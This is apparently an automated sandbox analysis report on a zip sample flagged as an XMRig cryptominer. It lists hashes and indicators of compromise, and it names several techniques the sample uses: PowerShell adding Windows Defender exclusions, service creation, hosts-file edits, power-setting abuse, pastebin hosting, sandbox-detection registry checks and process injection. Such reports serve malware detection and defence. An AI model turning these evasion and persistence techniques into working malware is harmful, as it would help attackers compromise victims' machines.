Analysis
-
max time kernel
279s -
max time network
278s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
20-12-2024 07:12
Static task
static1
Behavioral task
behavioral1
Sample
20-12-2024_UqVE2XPvW38Pgkj.zip
Resource
win11-20241007-en
General
-
Target
20-12-2024_UqVE2XPvW38Pgkj.zip
-
Size
4.3MB
-
MD5
cf356b163f946dc2f16d95febf45a583
-
SHA1
e7c8e964c23f86765d729b82d3140604bb00cb7c
-
SHA256
50d3bf20e1534889385de4b8d780a750c9d37a75c941ffae6dd961caef2eb325
-
SHA512
baa6367011ebda751fe7ef40a49f99e96c5daf19e068b02b2cdf564477f17a792a9dc0887b9723208d0c49d55a7e1c501723643d12fee8c8dcd0d1406e65be2d
-
SSDEEP
98304:YIv1mD5TqdFfK4iBOqWh3tWyfzbgwgGP7OZlGWwCR6t+uWiPBt1KP:YIdmFkF7iMtWKzkwgh1wc6t+cBS
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral1/memory/4204-172-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/4204-175-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/4204-178-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/4204-177-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/4204-176-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/4204-174-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/4204-171-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/4204-384-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/4204-385-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2916 powershell.exe 1032 powershell.exe 1740 powershell.exe 4120 powershell.exe 4768 powershell.exe 1568 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 6 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts Bootstrapper.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe File created C:\Windows\system32\drivers\etc\hosts Bootstrapper.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe File created C:\Windows\system32\drivers\etc\hosts Bootstrapper.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 25 IoCs
pid Process 4924 Bootstrapper.exe 388 Bootstrapper.exe 1072 Bootstrapper.exe 3604 Bootstrapper.exe 4000 updater.exe 768 ndp48-web.exe 4156 Setup.exe 3712 ndp48-web.exe 2916 Setup.exe 852 Bootstrapper.exe 240 Bootstrapper.exe 2856 updater.exe 1224 NDP481-Web.exe 2488 Setup.exe 2616 SetupUtility.exe 1156 SetupUtility.exe 4612 dismhost.exe 2456 Bootstrapper.exe 1608 Bootstrapper.exe 3508 NDP481-Web.exe 4920 Setup.exe 1596 updater.exe 828 SetupUtility.exe 3644 SetupUtility.exe 3644 dismhost.exe -
Loads dropped DLL 62 IoCs
pid Process 4156 Setup.exe 4156 Setup.exe 4156 Setup.exe 4156 Setup.exe 2916 Setup.exe 2916 Setup.exe 2916 Setup.exe 2916 Setup.exe 2488 Setup.exe 2488 Setup.exe 2488 Setup.exe 2488 Setup.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4612 dismhost.exe 4920 Setup.exe 4920 Setup.exe 4920 Setup.exe 4920 Setup.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe 3644 dismhost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 pastebin.com 3 pastebin.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 24 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4624 powercfg.exe 4776 powercfg.exe 4108 powercfg.exe 1752 powercfg.exe 3148 powercfg.exe 4184 powercfg.exe 2312 powercfg.exe 3620 powercfg.exe 3100 powercfg.exe 2180 powercfg.exe 3724 powercfg.exe 3228 powercfg.exe 4376 powercfg.exe 3064 powercfg.exe 424 powercfg.exe 1336 powercfg.exe 2500 powercfg.exe 3436 powercfg.exe 3732 powercfg.exe 480 powercfg.exe 1236 powercfg.exe 1012 powercfg.exe 5032 powercfg.exe 3528 powercfg.exe -
Checks system information in the registry 2 TTPs 4 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Setup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName Setup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Setup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName Setup.exe -
Drops file in System32 directory 40 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe updater.exe File opened for modification \??\c:\windows\syswow64\msvcp120_clr0400.dll Setup.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification \??\c:\windows\system32\aspnet_counters.dll Setup.exe File opened for modification \??\c:\windows\system32\vcruntime140_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\aspnet_counters.dll Setup.exe File opened for modification \??\c:\windows\syswow64\vcruntime140_clr0400.dll Setup.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification \??\c:\windows\system32\msvcp120_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\msvcr120_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\msvcp120_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\msvcr120_clr0400.dll Setup.exe File opened for modification C:\Windows\system32\MRT.exe Bootstrapper.exe File opened for modification \??\c:\windows\system32\msvcp120_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\msvcr120_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\ucrtbase_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\msvcp140_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\msvcr120_clr0400.dll Setup.exe File opened for modification C:\Windows\system32\MRT.exe Bootstrapper.exe File opened for modification \??\c:\windows\system32\msvcp140_clr0400.dll Setup.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification \??\c:\windows\system32\msvcp140_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\vcruntime140_clr0400.dll Setup.exe File opened for modification C:\Windows\system32\MRT.exe Bootstrapper.exe File opened for modification \??\c:\windows\syswow64\msvcr100_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\ucrtbase_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\msvcr100_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\vcruntime140_1_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\vcruntime140_1_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\aspnet_counters.dll Setup.exe File opened for modification \??\c:\windows\system32\msvcr100_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\aspnet_counters.dll Setup.exe File opened for modification \??\c:\windows\syswow64\ucrtbase_clr0400.dll Setup.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe File opened for modification \??\c:\windows\syswow64\vcruntime140_clr0400.dll Setup.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe File opened for modification \??\c:\windows\system32\msvcr100_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\ucrtbase_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\msvcp140_clr0400.dll Setup.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4000 set thread context of 3752 4000 updater.exe 142 PID 4000 set thread context of 4204 4000 updater.exe 147 -
resource yara_rule behavioral1/memory/4204-166-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4204-168-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4204-167-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4204-169-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4204-172-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4204-175-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4204-178-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4204-177-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4204-176-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4204-174-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4204-171-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4204-170-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4204-384-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4204-385-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification \??\c:\program files (x86)\microsoft.net\redistlist\assemblylist_4_extended.xml Setup.exe File opened for modification \??\c:\program files (x86)\microsoft.net\redistlist\assemblylist_4_client.xml Setup.exe File opened for modification \??\c:\program files (x86)\microsoft.net\redistlist\assemblylist_4_extended.xml Setup.exe File opened for modification \??\c:\program files (x86)\microsoft.net\redistlist\assemblylist_4_client.xml Setup.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\installpersistsqlstate.sql Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.drawing.primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.drawing.primitives.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\clr-etw.man Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\sql\en\dropsqlpersistenceproviderlogic.sql Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\microsoft.windows.applicationserver.applications.45.man Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\corperfmonext.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\default.win32manifest Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\system.io.memorymappedfiles.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.security.principal\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.security.principal.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\mscorsecimpl.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.dynamic.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\security\permissions\app_localresources\managepermissions.aspx.resx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\microsoft.build.xsd Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\aspnet_perf.h Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.servicemodel.duplex\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.servicemodel.duplex.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\config\web_lowtrust.config Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\sql\en\sqlpersistenceservice_schema.sql Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\config\browsers\blackberry.browser Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\system.io.filesystem.watcher.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\asp.netwebadminfiles\security\security0.aspx Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.diagnostics.textwritertracelistener\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.diagnostics.textwritertracelistener.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\security\wizard\app_localresources\wizardadduser.ascx.resx Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.servicemodel.discovery\v4.0_4.0.0.0__31bf3856ad364e35\system.servicemodel.discovery.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\regsvcs.exe Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\security\wizard\wizardinit.ascx Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.diagnostics.process\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.diagnostics.process.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\system.activities.presentation.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\microsoft.csharp.targets Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.diagnostics.stacktrace\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.diagnostics.stacktrace.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\microsoft.build.conversion.v4.0.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.objectmodel\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.objectmodel.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\asp.netwebadminfiles\images\unselectedtab_rightcorner.gif Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\presentationframework-systemxml\v4.0_4.0.0.0__b77a5c561934e089\presentationframework-systemxml.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\asp.netwebadminfiles\images\alert_lrg.gif Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.io\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.io.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\wpf\penimc_v0400.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.resources.resourcemanager\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.resources.resourcemanager.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe.config Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\appconfig\app_localresources\createappsetting.aspx.resx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\mscorlib.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\navigationbar.ascx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\dfsvc.exe.config Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\asp.netwebadminfiles\security\security.aspx Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.reflection\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.reflection.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\asp.netwebadminfiles\security\app_localresources\security.aspx.resx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\asp.netwebadminfiles\security\roles\managesinglerole.aspx Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\presentationcore\v4.0_4.0.0.0__31bf3856ad364e35\globalmonospace.compositefont Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\images\aspdotnet_logo.jpg Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\wpf\system.windows.input.manipulations.dll Setup.exe File opened for modification \??\c:\windows\inf\.net clr data\0000\_dataperfcounters_d.ini Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\system.servicemodel.servicemoniker40.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\appconfig\defineerrorpage.aspx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\system.data.oracleclient.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\config\web_hightrust.config.default Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\microsoft.visualbasic.activities.compiler.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\addinutil.exe.config Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\servicemodelevents.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\microsoft.workflow.compiler.exe.config Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\config\legacy.web_lowtrust.config Setup.exe File opened for modification \??\c:\windows\inf\.net memory cache 4.0\0000\netmemorycache_d.ini Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.threading.timer\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.threading.timer.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\sql\en\dropsqlpersistenceproviderschema.sql Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\jsc.exe Setup.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2448 sc.exe 4948 sc.exe 4252 sc.exe 1520 sc.exe 4852 sc.exe 4908 sc.exe 128 sc.exe 2036 sc.exe 1756 sc.exe 2472 sc.exe 2196 sc.exe 5036 sc.exe 1992 sc.exe 1716 sc.exe 4692 sc.exe 3372 sc.exe 1156 sc.exe 4092 sc.exe 1600 sc.exe 4480 sc.exe 4664 sc.exe 404 sc.exe 1540 sc.exe 1276 sc.exe 2108 sc.exe 1500 sc.exe 3260 sc.exe 4180 sc.exe 1004 sc.exe 404 sc.exe 1116 sc.exe 1436 sc.exe 1712 sc.exe 2380 sc.exe 1884 sc.exe 4120 sc.exe 3452 sc.exe 4884 sc.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File opened for modification C:\Users\Admin\Downloads\ndp48-web.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\NDP481-Web.exe:Zone.Identifier msedge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bootstrapper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SetupUtility.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bootstrapper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SetupUtility.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SetupUtility.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ndp48-web.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bootstrapper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SetupUtility.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NDP481-Web.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NDP481-Web.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ndp48-web.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bootstrapper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Setup.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Setup.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created 